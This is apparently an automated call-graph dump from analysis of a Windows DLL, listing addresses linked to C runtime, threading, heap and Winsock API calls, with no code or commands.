_$I10_OUTPUT 6 API calls 20405->20408 20406->20394 20407->20406 20413 6ced9150 20408->20413 20409 6ced90ee DecodePointer 20409->20405 20410 6ced9102 DecodePointer 20410->20409 20414 6ced9109 20410->20414 20411->20415 20413->20312 20414->20409 20416 6ced911a DecodePointer 20414->20416 20415->20409 20415->20410 20416->20409 20418 6ced10d1 __wsopen_helper 20417->20418 20419 6ced0e23 __FF_MSGBANNER 106 API calls 20418->20419 20431 6ced10f0 20418->20431 20420 6ced10df 20419->20420 20422 6ced0e80 __NMSG_WRITE 106 API calls 20420->20422 20424 6ced10e6 20422->20424 20427 6ced0a6c __mtinitlocknum 3 API calls 20424->20427 20425 6ced111d 20451 6ced103d 20425->20451 20426 6ced110e 20428 6cece5ab __wsopen_helper 106 API calls 20426->20428 20427->20431 20432 6ced1113 __wsopen_helper 20428->20432 20430 6ced1124 20433 6ced1149 20430->20433 20434 6ced1131 20430->20434 20431->20432 20446 6ced1204 20431->20446 20432->20303 20461 6cecb6e4 20433->20461 20458 6ced170c 20434->20458 20437 6ced113d 20467 6ced1165 20437->20467 20440 6ced0e23 __FF_MSGBANNER 106 API calls 20439->20440 20441 6ced0b97 20440->20441 20442 6ced0e80 __NMSG_WRITE 106 API calls 20441->20442 20443 6ced0b9f 20442->20443 20472 6ced0c3e 20443->20472 20449 6ced1212 20446->20449 20447 6cecb71c _malloc 106 API calls 20447->20449 20448 6ced1107 20448->20425 20448->20426 20449->20447 20449->20448 20470 6ced1a05 Sleep 20449->20470 20452 6ced104e 20451->20452 20453 6ced1061 EnterCriticalSection 20451->20453 20454 6ced10c5 __mtinitlocknum 105 API calls 20452->20454 20453->20430 20455 6ced1054 20454->20455 20455->20453 20456 6ced0b8f __amsg_exit 105 API calls 20455->20456 20457 6ced1060 20456->20457 20457->20453 20459 6ced171c 20458->20459 20460 6ced1729 InitializeCriticalSectionAndSpinCount 20458->20460 20459->20437 20460->20437 20462 6cecb6ed HeapFree 20461->20462 20463 6cecb716 __dosmaperr 20461->20463 20462->20463 20464 6cecb702 20462->20464 20463->20437 20465 6cece5ab __wsopen_helper 104 API calls 20464->20465 20466 6cecb708 GetLastError 20465->20466 20466->20463 20471 6ced11a7 LeaveCriticalSection 20467->20471 20469 6ced116c 20469->20432 20470->20449 20471->20469 20475 6ced0cf4 20472->20475 20474 6ced0baa 20476 6ced0d00 __wsopen_helper 20475->20476 20477 6ced103d __lock 99 API calls 20476->20477 20478 6ced0d07 20477->20478 20479 6ced0dc0 _doexit 20478->20479 20480 6ced0d35 DecodePointer 20478->20480 20509 6ced0e0e 20479->20509 20480->20479 20482 6ced0d4c DecodePointer 20480->20482 20490 6ced0d5c 20482->20490 20484 6ced0e1d __wsopen_helper 20484->20474 20485 6ced0df4 20513 6ced11a7 LeaveCriticalSection 20485->20513 20487 6ced0e05 20489 6ced0a6c __mtinitlocknum 3 API calls 20487->20489 20488 6ced0d69 EncodePointer 20488->20490 20492 6ced0e0e 20489->20492 20490->20479 20490->20488 20491 6ced0d79 DecodePointer EncodePointer 20490->20491 20499 6cedf345 20491->20499 20505 6cedf3b8 TlsFree 20491->20505 20507 6cedf39d TlsFree 20491->20507 20493 6ced0e1b 20492->20493 20514 6ced11a7 LeaveCriticalSection 20492->20514 20493->20474 20494 6ced0d8b DecodePointer DecodePointer 20494->20490 20500 6cedf34f __EH_prolog 20499->20500 20501 6cedf363 20500->20501 20515 6ceb2d13 20500->20515 20522 6ceb8be0 20501->20522 20506 6cedf3d1 Mailbox 20505->20506 20506->20494 20508 6cedf3b6 Mailbox 20507->20508 20508->20494 20510 6ced0dee 20509->20510 20511 6ced0e14 20509->20511 20510->20484 20510->20485 20567 6ced11a7 LeaveCriticalSection 20511->20567 20513->20487 20514->20493 20516 6ceb2d1d __EH_prolog 20515->20516 20517 6ceb2d3c DeleteCriticalSection 20516->20517 20525 6ceb24df InterlockedExchange 20516->20525 20540 6ceb9f84 20516->20540 20519 6ceb2d67 20517->20519 20519->20501 20564 6ceb1e0b InterlockedDecrement 20522->20564 20526 6ceb251c Mailbox 20525->20526 20527 6ceb253f InterlockedExchangeAdd 20526->20527 20528 6ceb2522 SetWaitableTimer 20526->20528 20530 6ceb2615 Mailbox 20527->20530 20532 6ceb2552 Mailbox 20527->20532 20528->20527 20529 6ceb2632 20529->20516 20530->20529 20550 6ceb201d WaitForMultipleObjects CloseHandle 20530->20550 20533 6ceb2590 GetQueuedCompletionStatus 20532->20533 20538 6ceb25da InterlockedDecrement 20532->20538 20546 6ceb8de4 20532->20546 20533->20532 20534 6ceb25bf InterlockedDecrement 20533->20534 20543 6ceb21eb 20534->20543 20537 6ceb2605 InterlockedExchangeAdd 20537->20530 20537->20532 20539 6ceb21eb 99 API calls 20538->20539 20539->20532 20556 6ceb3af6 20540->20556 20544 6cec9270 Mailbox 106 API calls 20543->20544 20545 6ceb21fc 20544->20545 20545->20532 20547 6ceb8e05 20546->20547 20548 6ceb8e25 Mailbox 20547->20548 20549 6ceb21eb 106 API calls 20547->20549 20548->20537 20549->20547 20551 6ceb8cea InterlockedExchangeAdd 20550->20551 20552 6ceb204f 20551->20552 20553 6ceb2058 TerminateThread 20552->20553 20554 6ceb2060 QueueUserAPC WaitForSingleObject 20552->20554 20555 6ceb2076 20553->20555 20554->20555 20555->20529 20557 6ceb8bf5 EnterCriticalSection 20556->20557 20562 6ceb3b25 20557->20562 20558 6ceb3b43 20559 6ceb8c4d LeaveCriticalSection 20558->20559 20561 6ceb3b51 20559->20561 20560 6cec9270 Mailbox 106 API calls 20560->20562 20561->20516 20562->20558 20562->20560 20563 6ceb3f84 106 API calls 20562->20563 20563->20562 20565 6ceb1e1c 20564->20565 20566 6ceb1e16 WSACleanup 20564->20566 20565->20494 20566->20565 20567->20510 20569 6ced0a63 ExitProcess 20568->20569 20570 6ced0a51 GetProcAddress 20568->20570 20570->20569 20585 6ced16cb 20571->20585 20573 6cece3d7 20574 6cece425 SetLastError 20573->20574 20588 6ced11bc 20573->20588 20574->20320 20578 6cece3fe 20579 6cece41c 20578->20579 20580 6cece404 20578->20580 20582 6cecb6e4 _free 103 API calls 20579->20582 20597 6cece431 20580->20597 20584 6cece422 20582->20584 20583 6cece40c GetCurrentThreadId 20583->20574 20584->20574 20586 6ced16de 20585->20586 20587 6ced16e2 TlsGetValue 20585->20587 20586->20573 20587->20573 20591 6ced11c3 20588->20591 20590 6cece3ea 20590->20574 20594 6ced16ea 20590->20594 20591->20590 20593 6ced11e1 20591->20593 20607 6ced9268 20591->20607 20593->20590 20593->20591 20615 6ced1a05 Sleep 20593->20615 20595 6ced1704 TlsSetValue 20594->20595 20596 6ced1700 20594->20596 20595->20578 20596->20578 20598 6cece43d __wsopen_helper 20597->20598 20599 6ced103d __lock 106 API calls 20598->20599 20600 6cece47a 20599->20600 20616 6cece4d2 20600->20616 20603 6ced103d __lock 106 API calls 20604 6cece49b ___addlocaleref 20603->20604 20619 6cece4db 20604->20619 20606 6cece4c6 __wsopen_helper 20606->20583 20608 6ced9273 20607->20608 20612 6ced928e 20607->20612 20609 6ced927f 20608->20609 20608->20612 20611 6cece5ab __wsopen_helper 105 API calls 20609->20611 20610 6ced929e RtlAllocateHeap 20610->20612 20613 6ced9284 20610->20613 20611->20613 20612->20610 20612->20613 20614 6ced0953 __calloc_impl DecodePointer 20612->20614 20613->20591 20614->20612 20615->20593 20622 6ced11a7 LeaveCriticalSection 20616->20622 20618 6cece494 20618->20603 20623 6ced11a7 LeaveCriticalSection 20619->20623 20621 6cece4e2 20621->20606 20622->20618 20623->20621 20625 6cecb71c _malloc 106 API calls 20624->20625 20626 6ceb60e3 __wctomb_s_l 20625->20626 20630 6cecc24e GetSystemTimeAsFileTime 20627->20630 20629 6ceb3ff2 CreateFileW 20629->20099 20629->20100 20631 6cecc27c __aulldiv 20630->20631 20631->20629 20642 6ceca9eb 20632->20642 20635 6cecab15 20636 6cece5ab __wsopen_helper 106 API calls 20635->20636 20637 6cecab1a 20636->20637 20638 6cecd645 __wsopen_helper 9 API calls 20637->20638 20640 6cecab25 ___ascii_stricmp 20638->20640 20639 6cece0ca 113 API calls __tolower_l 20641 6cecab2c 20639->20641 20640->20111 20641->20639 20641->20640 20643 6ceca9fc 20642->20643 20649 6cecaa49 20642->20649 20650 6cece3aa 20643->20650 20646 6cecaa29 20646->20649 20670 6cecdc91 20646->20670 20649->20635 20649->20641 20651 6cece3c2 __getptd_noexit 106 API calls 20650->20651 20652 6cece3b0 20651->20652 20653 6cecaa02 20652->20653 20654 6ced0b8f __amsg_exit 106 API calls 20652->20654 20653->20646 20655 6cecd90f 20653->20655 20654->20653 20656 6cecd91b __wsopen_helper 20655->20656 20657 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 20656->20657 20658 6cecd924 20657->20658 20659 6cecd953 20658->20659 20660 6cecd937 20658->20660 20661 6ced103d __lock 106 API calls 20659->20661 20662 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 20660->20662 20663 6cecd95a 20661->20663 20665 6cecd93c 20662->20665 20682 6cecd98f 20663->20682 20668 6cecd94a __wsopen_helper 20665->20668 20669 6ced0b8f __amsg_exit 106 API calls 20665->20669 20668->20646 20669->20668 20671 6cecdc9d __wsopen_helper 20670->20671 20672 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 20671->20672 20673 6cecdca7 20672->20673 20674 6ced103d __lock 106 API calls 20673->20674 20675 6cecdcb9 20673->20675 20680 6cecdcd7 20674->20680 20676 6cecdcc7 __wsopen_helper 20675->20676 20678 6ced0b8f __amsg_exit 106 API calls 20675->20678 20676->20649 20677 6cecdd04 20936 6cecdd2e 20677->20936 20678->20676 20680->20677 20681 6cecb6e4 _free 106 API calls 20680->20681 20681->20677 20683 6cecd96e 20682->20683 20684 6cecd99a ___addlocaleref ___removelocaleref 20682->20684 20686 6cecd986 20683->20686 20684->20683 20689 6cecd715 20684->20689 20935 6ced11a7 LeaveCriticalSection 20686->20935 20688 6cecd98d 20688->20665 20690 6cecd78e 20689->20690 20691 6cecd72a 20689->20691 20692 6cecd7db 20690->20692 20693 6cecb6e4 _free 106 API calls 20690->20693 20691->20690 20699 6cecb6e4 _free 106 API calls 20691->20699 20716 6cecd75b 20691->20716 20718 6cecd804 20692->20718 20759 6ced640d 20692->20759 20695 6cecd7af 20693->20695 20697 6cecb6e4 _free 106 API calls 20695->20697 20702 6cecd7c2 20697->20702 20698 6cecb6e4 _free 106 API calls 20703 6cecd783 20698->20703 20704 6cecd750 20699->20704 20700 6cecb6e4 _free 106 API calls 20700->20718 20701 6cecd863 20705 6cecb6e4 _free 106 API calls 20701->20705 20707 6cecb6e4 _free 106 API calls 20702->20707 20710 6cecb6e4 _free 106 API calls 20703->20710 20719 6ced62aa 20704->20719 20713 6cecd869 20705->20713 20706 6cecb6e4 _free 106 API calls 20708 6cecd76e 20706->20708 20709 6cecd7d0 20707->20709 20747 6ced63a6 20708->20747 20715 6cecb6e4 _free 106 API calls 20709->20715 20710->20690 20711 6cecb6e4 106 API calls _free 20711->20718 20713->20683 20715->20692 20716->20706 20717 6cecd779 20716->20717 20717->20698 20718->20701 20718->20711 20720 6ced62b9 20719->20720 20746 6ced63a2 20719->20746 20721 6ced62ca 20720->20721 20722 6cecb6e4 _free 106 API calls 20720->20722 20723 6ced62dc 20721->20723 20725 6cecb6e4 _free 106 API calls 20721->20725 20722->20721 20724 6ced62ee 20723->20724 20726 6cecb6e4 _free 106 API calls 20723->20726 20727 6ced6300 20724->20727 20728 6cecb6e4 _free 106 API calls 20724->20728 20725->20723 20726->20724 20729 6ced6312 20727->20729 20730 6cecb6e4 _free 106 API calls 20727->20730 20728->20727 20731 6ced6324 20729->20731 20733 6cecb6e4 _free 106 API calls 20729->20733 20730->20729 20732 6ced6336 20731->20732 20734 6cecb6e4 _free 106 API calls 20731->20734 20735 6ced6348 20732->20735 20736 6cecb6e4 _free 106 API calls 20732->20736 20733->20731 20734->20732 20737 6ced635a 20735->20737 20738 6cecb6e4 _free 106 API calls 20735->20738 20736->20735 20739 6cecb6e4 _free 106 API calls 20737->20739 20743 6ced636c 20737->20743 20738->20737 20739->20743 20740 6cecb6e4 _free 106 API calls 20741 6ced637e 20740->20741 20742 6ced6390 20741->20742 20744 6cecb6e4 _free 106 API calls 20741->20744 20745 6cecb6e4 _free 106 API calls 20742->20745 20742->20746 20743->20740 20743->20741 20744->20742 20745->20746 20746->20716 20748 6ced6409 20747->20748 20749 6ced63b1 20747->20749 20748->20717 20750 6ced63c1 20749->20750 20751 6cecb6e4 _free 106 API calls 20749->20751 20752 6ced63d3 20750->20752 20754 6cecb6e4 _free 106 API calls 20750->20754 20751->20750 20753 6ced63e5 20752->20753 20755 6cecb6e4 _free 106 API calls 20752->20755 20756 6ced63f7 20753->20756 20757 6cecb6e4 _free 106 API calls 20753->20757 20754->20752 20755->20753 20756->20748 20758 6cecb6e4 _free 106 API calls 20756->20758 20757->20756 20758->20748 20760 6ced641c 20759->20760 20934 6cecd7f9 20759->20934 20761 6cecb6e4 _free 106 API calls 20760->20761 20762 6ced6424 20761->20762 20763 6cecb6e4 _free 106 API calls 20762->20763 20764 6ced642c 20763->20764 20765 6cecb6e4 _free 106 API calls 20764->20765 20766 6ced6434 20765->20766 20767 6cecb6e4 _free 106 API calls 20766->20767 20768 6ced643c 20767->20768 20769 6cecb6e4 _free 106 API calls 20768->20769 20770 6ced6444 20769->20770 20771 6cecb6e4 _free 106 API calls 20770->20771 20772 6ced644c 20771->20772 20773 6cecb6e4 _free 106 API calls 20772->20773 20774 6ced6453 20773->20774 20775 6cecb6e4 _free 106 API calls 20774->20775 20776 6ced645b 20775->20776 20777 6cecb6e4 _free 106 API calls 20776->20777 20778 6ced6463 20777->20778 20934->20700 20935->20688 20939 6ced11a7 LeaveCriticalSection 20936->20939 20938 6cecdd35 20938->20675 20939->20938 20941 6cecccc9 RaiseException 20940->20941 20941->20123 20944 6cecc29f Mailbox 106 API calls 20943->20944 20945 6cec57c6 20944->20945 20945->20126 20947 6cec9299 20946->20947 20948 6ceb5afc 20946->20948 20961 6cecbaf7 20947->20961 20948->20131 20951 6ceb468e 110 API calls 20950->20951 20952 6ceb9fc5 20951->20952 20952->20134 20954 6cebf085 20953->20954 21027 6cebef10 20954->21027 20958 6cebf280 20957->20958 21071 6cec39c8 20958->21071 20964 6cecb9fb 20961->20964 20963 6cecbb02 20963->20948 20965 6cecba07 __wsopen_helper 20964->20965 20972 6ced0ce2 20965->20972 20971 6cecba2e __wsopen_helper 20971->20963 20973 6ced103d __lock 106 API calls 20972->20973 20974 6cecba10 20973->20974 20975 6cecba3f DecodePointer DecodePointer 20974->20975 20976 6cecba6c 20975->20976 20977 6cecba1c 20975->20977 20976->20977 20989 6ced165d 20976->20989 20986 6cecba39 20977->20986 20979 6cecbacf EncodePointer EncodePointer 20979->20977 20980 6cecba7e 20980->20979 20981 6cecbaa3 20980->20981 20996 6ced124b 20980->20996 20981->20977 20983 6ced124b __realloc_crt 101 API calls 20981->20983 20984 6cecbabd EncodePointer 20981->20984 20985 6cecbab7 20983->20985 20984->20979 20985->20977 20985->20984 21023 6ced0ceb 20986->21023 20990 6ced167b HeapSize 20989->20990 20991 6ced1666 20989->20991 20990->20980 20992 6cece5ab __wsopen_helper 105 API calls 20991->20992 20993 6ced166b 20992->20993 20994 6cecd645 __wsopen_helper 9 API calls 20993->20994 20995 6ced1676 20994->20995 20995->20980 20999 6ced1252 20996->20999 20998 6ced128f 20998->20981 20999->20998 21001 6ced9154 20999->21001 21022 6ced1a05 Sleep 20999->21022 21002 6ced915d 21001->21002 21003 6ced9168 21001->21003 21004 6cecb71c _malloc 103 API calls 21002->21004 21005 6ced9170 21003->21005 21013 6ced917d 21003->21013 21006 6ced9165 21004->21006 21007 6cecb6e4 _free 103 API calls 21005->21007 21006->20999 21017 6ced9178 __dosmaperr 21007->21017 21008 6ced91b5 21010 6ced0953 __calloc_impl DecodePointer 21008->21010 21009 6ced9185 HeapReAlloc 21009->21013 21009->21017 21011 6ced91bb 21010->21011 21014 6cece5ab __wsopen_helper 103 API calls 21011->21014 21012 6ced91e5 21016 6cece5ab __wsopen_helper 103 API calls 21012->21016 21013->21008 21013->21009 21013->21012 21015 6ced0953 __calloc_impl DecodePointer 21013->21015 21019 6ced91cd 21013->21019 21014->21017 21015->21013 21018 6ced91ea GetLastError 21016->21018 21017->20999 21018->21017 21020 6cece5ab __wsopen_helper 103 API calls 21019->21020 21021 6ced91d2 GetLastError 21020->21021 21021->21017 21022->20999 21026 6ced11a7 LeaveCriticalSection 21023->21026 21025 6cecba3e 21025->20971 21026->21025 21032 6ceb190f 21027->21032 21029 6cebef21 21030 6ceb5b60 21029->21030 21035 6cec6747 21029->21035 21030->20137 21030->20140 21030->20141 21033 6cec9270 Mailbox 106 API calls 21032->21033 21034 6ceb191a 21033->21034 21034->21029 21036 6cec6761 21035->21036 21039 6ceb33a7 21036->21039 21040 6ceb33bf 21039->21040 21041 6ceb33d5 21039->21041 21061 6cebe893 21040->21061 21043 6ceb33f0 21041->21043 21044 6ceb33e0 21041->21044 21054 6ceb332e WSASetLastError WSASend 21043->21054 21046 6cec9270 Mailbox 106 API calls 21044->21046 21047 6ceb33cc 21046->21047 21047->21029 21048 6ceb3452 WSASetLastError select 21064 6cebe8bd 21048->21064 21049 6cebe869 106 API calls 21051 6ceb3402 21049->21051 21051->21047 21051->21048 21051->21049 21052 6cec9270 106 API calls Mailbox 21051->21052 21053 6ceb332e 106 API calls 21051->21053 21052->21051 21053->21051 21055 6cebe8bd WSAGetLastError 21054->21055 21056 6ceb3365 21055->21056 21057 6ceb3389 21056->21057 21059 6cebe893 104 API calls 21056->21059 21058 6ceb338d 21057->21058 21060 6cec9270 Mailbox 104 API calls 21057->21060 21058->21051 21059->21057 21060->21058 21068 6ceb1c52 21061->21068 21065 6ceb1c4d 21064->21065 21066 6cebe8c7 WSAGetLastError 21065->21066 21067 6cebe8d7 21066->21067 21067->21051 21069 6cec9270 Mailbox 106 API calls 21068->21069 21070 6ceb1c5d 21069->21070 21070->21047 21072 6ceb190f 106 API calls 21071->21072 21075 6cec39d9 21072->21075 21073 6cebf294 21073->20137 21075->21073 21076 6cec728a 21075->21076 21077 6cec72a4 21076->21077 21080 6ceb3135 21077->21080 21081 6ceb3163 21080->21081 21082 6ceb3151 21080->21082 21085 6ceb316e 21081->21085 21096 6ceb3181 21081->21096 21083 6cebe893 106 API calls 21082->21083 21084 6ceb315e 21083->21084 21084->21075 21088 6cec9270 Mailbox 106 API calls 21085->21088 21086 6ceb3184 WSASetLastError WSARecv 21087 6cebe8bd WSAGetLastError 21086->21087 21087->21096 21088->21084 21089 6cebe893 106 API calls 21089->21096 21090 6cec9270 106 API calls Mailbox 21090->21096 21091 6ceb32bd 21097 6cebe8ff 21091->21097 21093 6ceb3257 WSASetLastError select 21095 6cebe8bd WSAGetLastError 21093->21095 21094 6cebe869 106 API calls 21094->21096 21095->21096 21096->21084 21096->21086 21096->21089 21096->21090 21096->21091 21096->21093 21096->21094 21100 6ceb1c67 21097->21100 21118 6cec5aac 21107->21118 21109 6cec3c1f 21109->20163 21111 6ceb4cdc __EH_prolog 21110->21111 21242 6ceca860 21111->21242 21113 6ceb4ce4 21114 6ceb4cfa 21113->21114 21115 6ceb4a8f Mailbox 106 API calls 21113->21115 21114->20058 21116 6ceb4cf0 21115->21116 21117 6cebed75 Mailbox 106 API calls 21116->21117 21117->21114 21123 6ceb4b0f 21118->21123 21120 6cec5ad5 Mailbox 21122 6cec5afe 21120->21122 21129 6ceb4b8c 21120->21129 21122->21109 21135 6cedd8f0 21123->21135 21125 6ceb4b19 GetProcessHeap HeapAlloc 21126 6ceb4b5b 21125->21126 21127 6ceb4b32 std::exception::exception 21125->21127 21126->21120 21136 6cebedf3 21127->21136 21130 6ceb4b96 __EH_prolog 21129->21130 21176 6ceb9add 21130->21176 21132 6ceb4bbb 21179 6ceb4abb 21132->21179 21135->21125 21137 6cebee16 Mailbox 21136->21137 21144 6cec355b 21137->21144 21139 6cebee23 21147 6cec35cc 21139->21147 21142 6cecccaa __CxxThrowException@8 RaiseException 21143 6cebee4e Concurrency::details::_TaskCollectionImpl::_Complete 21142->21143 21143->21126 21150 6cecac83 21144->21150 21146 6cec3583 Mailbox 21146->21139 21169 6cec499d 21147->21169 21149 6cebee3e 21149->21142 21153 6cecacb1 21150->21153 21154 6cecacbf 21153->21154 21157 6cecac9f 21153->21157 21159 6cecad47 21154->21159 21157->21146 21160 6cecacc4 21159->21160 21161 6cecad50 21159->21161 21160->21157 21163 6cecad09 21160->21163 21162 6cecb6e4 _free 106 API calls 21161->21162 21162->21160 21164 6cecad15 _strlen 21163->21164 21167 6cecad3a 21163->21167 21165 6cecb71c _malloc 106 API calls 21164->21165 21166 6cecad27 21165->21166 21166->21167 21168 6cecf40c _$I10_OUTPUT 106 API calls 21166->21168 21167->21157 21168->21167 21170 6cec49c5 21169->21170 21173 6cec0873 21170->21173 21172 6cec49f9 Mailbox 21172->21149 21174 6cecac83 std::exception::exception 106 API calls 21173->21174 21175 6cec089b Mailbox 21174->21175 21175->21172 21187 6cebe202 21176->21187 21178 6ceb9af9 21178->21132 21200 6cedd8f0 21179->21200 21181 6ceb4ac5 CreateEventA 21182 6ceb4aee 21181->21182 21183 6ceb4adc 21181->21183 21182->21122 21201 6ceb4a8f 21183->21201 21190 6cebfe9c 21187->21190 21189 6cebe230 Mailbox 21189->21178 21191 6cebfeaa 21190->21191 21192 6cebfeac 21190->21192 21191->21189 21193 6cebfec1 21192->21193 21195 6cecc29f Mailbox 106 API calls 21192->21195 21193->21191 21196 6cec8261 21193->21196 21195->21193 21197 6cec827c std::exception::exception 21196->21197 21198 6cecccaa __CxxThrowException@8 RaiseException 21197->21198 21199 6cec8291 21198->21199 21200->21181 21202 6cec9270 Mailbox 106 API calls 21201->21202 21203 6ceb4a97 21202->21203 21214 6ceb1b26 21203->21214 21205 6ceb4aa6 21206 6cebed75 21205->21206 21207 6cebed9b Mailbox 21206->21207 21221 6cec3513 21207->21221 21215 6ceb1b30 __EH_prolog 21214->21215 21218 6cecac43 21215->21218 21217 6ceb1b46 Mailbox 21217->21205 21219 6cecad09 std::exception::_Copy_str 106 API calls 21218->21219 21220 6cecac61 21219->21220 21220->21217 21227 6cec4837 21221->21227 21230 6cec007a 21227->21230 21229 6cec485e Mailbox 21231 6ceb171f std::bad_exception::bad_exception 106 API calls 21230->21231 21232 6cec00a1 21231->21232 21233 6ceb8845 Mailbox 106 API calls 21232->21233 21234 6cec00d2 21233->21234 21234->21229 21248 6cecbb0c 21242->21248 21245 6ceca884 21245->21113 21246 6ceca8ad ResumeThread 21246->21113 21247 6ceca8a6 CloseHandle 21247->21246 21249 6cecbb2e 21248->21249 21250 6cecbb1a 21248->21250 21251 6ced11bc __calloc_crt 106 API calls 21249->21251 21252 6cece5ab __wsopen_helper 106 API calls 21250->21252 21253 6cecbb3b 21251->21253 21254 6cecbb1f 21252->21254 21255 6cecbb8c 21253->21255 21257 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 21253->21257 21256 6cecd645 __wsopen_helper 9 API calls 21254->21256 21258 6cecb6e4 _free 106 API calls 21255->21258 21262 6ceca87b 21256->21262 21259 6cecbb48 21257->21259 21260 6cecbb92 21258->21260 21261 6cece431 __initptd 106 API calls 21259->21261 21260->21262 21267 6cece58a 21260->21267 21263 6cecbb51 CreateThread 21261->21263 21262->21245 21262->21246 21262->21247 21263->21262 21266 6cecbb84 GetLastError 21263->21266 21275 6cecbc6c 21263->21275 21266->21255 21272 6cece577 21267->21272 21269 6cece593 __dosmaperr 21270 6cece5ab __wsopen_helper 106 API calls 21269->21270 21271 6cece5a6 21270->21271 21271->21262 21273 6cece3c2 __getptd_noexit 106 API calls 21272->21273 21274 6cece57c 21273->21274 21274->21269 21276 6cecbc75 __threadstartex@4 21275->21276 21277 6ced16cb __CRT_INIT@12 TlsGetValue 21276->21277 21278 6cecbc7b 21277->21278 21279 6cecbcae 21278->21279 21280 6cecbc82 __threadstartex@4 21278->21280 21308 6cece23f 21279->21308 21282 6ced16ea __CRT_INIT@12 TlsSetValue 21280->21282 21283 6cecbc91 21282->21283 21284 6cecbca4 GetCurrentThreadId 21283->21284 21285 6cecbc97 GetLastError ExitThread 21283->21285 21286 6cecbcc9 ___crtIsPackagedApp 21284->21286 21287 6cecbcdd 21286->21287 21291 6cecbc14 21286->21291 21297 6cecbba5 21287->21297 21292 6cecbc1d LoadLibraryExW GetProcAddress 21291->21292 21293 6cecbc56 DecodePointer 21291->21293 21294 6cecbc3f 21292->21294 21295 6cecbc40 EncodePointer 21292->21295 21296 6cecbc66 21293->21296 21294->21287 21295->21293 21296->21287 21298 6cecbbb1 __wsopen_helper 21297->21298 21299 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 21298->21299 21300 6cecbbb6 21299->21300 21340 6ceca8d0 21300->21340 21349 6ceb219a 21300->21349 21301 6cecbbc0 21309 6cece24b __wsopen_helper 21308->21309 21310 6cece264 21309->21310 21311 6cecb6e4 _free 106 API calls 21309->21311 21313 6cece353 __wsopen_helper 21309->21313 21312 6cece273 21310->21312 21314 6cecb6e4 _free 106 API calls 21310->21314 21311->21310 21315 6cece282 21312->21315 21316 6cecb6e4 _free 106 API calls 21312->21316 21313->21286 21314->21312 21317 6cece291 21315->21317 21319 6cecb6e4 _free 106 API calls 21315->21319 21316->21315 21318 6cece2a0 21317->21318 21320 6cecb6e4 _free 106 API calls 21317->21320 21321 6cece2af 21318->21321 21322 6cecb6e4 _free 106 API calls 21318->21322 21319->21317 21320->21318 21323 6cece2be 21321->21323 21324 6cecb6e4 _free 106 API calls 21321->21324 21322->21321 21325 6cece2d0 21323->21325 21327 6cecb6e4 _free 106 API calls 21323->21327 21324->21323 21326 6ced103d __lock 106 API calls 21325->21326 21328 6cece2d8 21326->21328 21327->21325 21331 6cecb6e4 _free 106 API calls 21328->21331 21333 6cece2fb 21328->21333 21331->21333 21432 6cece35f 21333->21432 21363 6cec9d70 21340->21363 21418 6cedd8f0 21349->21418 21351 6ceb219f SetEvent 21352 6ceb21bb SetEvent SleepEx 21351->21352 21352->21301 21381 6cec9dd4 21363->21381 21364 6cec9e50 21365 6cec9e66 21364->21365 21367 6cec9e63 CloseHandle 21364->21367 21366 6cec9e2e ResetEvent 21367->21365 21369 6cec9efc WaitForSingleObject 21369->21381 21370 6cec9dec 21370->21366 21371 6cec9e05 OpenEventA 21370->21371 21400 6ceca380 21370->21400 21379 6cec9ed0 CreateEventA 21379->21381 21381->21364 21381->21369 21381->21370 21381->21379 21382 6ceca380 GetCurrentProcessId 21381->21382 21384 6cec9eee CloseHandle 21381->21384 21382->21381 21384->21381 21418->21351 21441 6ceca06d 21440->21441 21442 6ceb4d22 21440->21442 21441->21442 21443 6ceca081 GetProcessHeap HeapFree 21441->21443 21444 6ceb9ca7 21442->21444 21443->21442 21445 6ceb4d2d 21444->21445 21446 6ceb9cb6 21444->21446 21445->20058 21448 6ceb4c0f 21446->21448 21449 6ceb4c27 21448->21449 21450 6ceb4c21 21448->21450 21449->21445 21452 6cebee68 21450->21452 21453 6cebee77 21452->21453 21456 6ceb4b69 GetProcessHeap HeapFree 21453->21456 21455 6cebee7f 21455->21449 21456->21455 21458 6cecaffb 21457->21458 21459 6cece5ab __wsopen_helper 106 API calls 21458->21459 21461 6cecb00b _strlen 21458->21461 21460 6cecb000 21459->21460 21462 6cecd645 __wsopen_helper 9 API calls 21460->21462 21461->20177 21462->21461 21464 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 21463->21464 21465 6cece815 21464->21465 21466 6cece5ab __wsopen_helper 106 API calls 21465->21466 21467 6cece81a 21466->21467 21468 6cecf2eb 21467->21468 21480 6cece83a __output_l __aulldvrm _strlen 21467->21480 21508 6ced23e3 21467->21508 21469 6cece5ab __wsopen_helper 106 API calls 21468->21469 21471 6cecf2f0 21469->21471 21473 6cecd645 __wsopen_helper 9 API calls 21471->21473 21472 6cecf2c5 21474 6ceccc9b _$I10_OUTPUT 6 API calls 21472->21474 21473->21472 21475 6cecabe6 21474->21475 21475->20187 21487 6cece651 21475->21487 21477 6cecf320 126 API calls __output_l 21477->21480 21478 6ceceea3 DecodePointer 21478->21480 21479 6cecb6e4 _free 106 API calls 21479->21480 21480->21468 21480->21472 21480->21477 21480->21478 21480->21479 21481 6ced1204 __malloc_crt 106 API calls 21480->21481 21482 6cecef06 DecodePointer 21480->21482 21483 6cecf368 126 API calls _write_multi_char 21480->21483 21484 6cecef2b DecodePointer 21480->21484 21485 6ced89b4 108 API calls __cftof 21480->21485 21486 6cecf394 126 API calls _write_string 21480->21486 21515 6ced6bde 21480->21515 21481->21480 21482->21480 21483->21480 21484->21480 21485->21480 21486->21480 21488 6ced23e3 __output_l 106 API calls 21487->21488 21489 6cece65f 21488->21489 21490 6cece66a 21489->21490 21491 6cece681 21489->21491 21492 6cece5ab __wsopen_helper 106 API calls 21490->21492 21493 6cece686 21491->21493 21501 6cece693 __flsbuf 21491->21501 21503 6cece66f 21492->21503 21494 6cece5ab __wsopen_helper 106 API calls 21493->21494 21494->21503 21495 6cece6f7 21498 6cece728 21495->21498 21499 6cece711 21495->21499 21496 6cece771 21497 6ced2d1b __write 126 API calls 21496->21497 21497->21503 21498->21503 21558 6ced86c6 21498->21558 21530 6ced2d1b 21499->21530 21501->21503 21504 6cece6e2 21501->21504 21507 6cece6ed 21501->21507 21518 6ced8672 21501->21518 21503->20187 21504->21507 21527 6ced8835 21504->21527 21507->21495 21507->21496 21509 6ced23ed 21508->21509 21510 6ced2402 21508->21510 21511 6cece5ab __wsopen_helper 106 API calls 